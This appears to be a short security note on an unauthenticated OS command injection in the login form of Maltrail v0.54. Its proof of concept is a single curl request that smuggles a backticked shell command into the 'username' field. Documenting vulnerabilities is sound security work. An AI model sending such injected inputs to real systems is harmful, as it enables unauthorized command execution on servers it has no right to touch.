🛤️Maltrail - OS Command Injection

Application Description

Maltrail is a malicious traffic detection system ,read more about it HERE

Vulnerability Description

On February 24th, 2023, a researcher discovered and reported a vulnerability in Maltrail v0.54. This vulnerability exposes the system to unauthenticated OS command injection during the login process.

POC

Maltrail main web page

The vulnerability exists in the 'username' parameter, which is susceptible to blind OS command injection.

curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/test`'

Resources

Unauthenticated OS Command Injection in stamparm/maltrail - vulnerability database | Vulners.comVulners Database

PreviousCVE-2023-27163 NextCrafty - HTB

Last updated 2 years ago

hashtagApplication Description

hashtagVulnerability Description

hashtagPOC

hashtagResources

Application Description

Vulnerability Description

POC

Resources